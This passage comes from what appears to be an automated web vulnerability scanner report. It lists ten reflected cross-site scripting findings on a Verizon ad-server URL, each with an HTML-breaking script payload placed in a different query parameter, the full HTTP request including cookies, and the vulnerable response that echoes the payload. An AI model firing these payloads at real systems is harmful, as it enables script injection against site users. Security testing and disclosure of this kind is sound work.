P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
lick_lx.ads/vzsurround2.net/homepage/L24/128228188/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&au
...[SNIP]...

2.431. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7caf7"><script>alert(1)</script>50a54869684 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ge/L24/1187278687/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=7caf7"><script>alert(1)</script>50a54869684&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email
...[SNIP]...

2.432. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da7f"><script>alert(1)</script>dd21dfded12 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
716448215/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1da7f"><script>alert(1)</script>dd21dfded12&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhos
...[SNIP]...

2.433. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d09c"><script>alert(1)</script>fd46850320a was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1685458801/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=1d09c"><script>alert(1)</script>fd46850320a&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_b
...[SNIP]...

2.434. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7047a"><script>alert(1)</script>d1e5424609b was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ine.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/744514784/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.2187047a"><script>alert(1)</script>d1e5424609b&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=
...[SNIP]...

2.435. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b4c"><script>alert(1)</script>f168f1782af was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
p/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&
...[SNIP]...

2.436. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67eb7"><script>alert(1)</script>25f6305b55d was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/vzsurround2.net/homepage/L24/1707385016/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&
...[SNIP]...

2.437. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>883683fd3b3 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.net/homepage/L24/1213504191/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail
...[SNIP]...

2.438. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69473"><script>alert(1)</script>59a6c993841 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
A_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&we
...[SNIP]...

2.439. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bff5"><script>alert(1)</script>2291f6d753d was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ndicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.440. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c02f"><script>alert(1)</script>7422fc85b1a was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

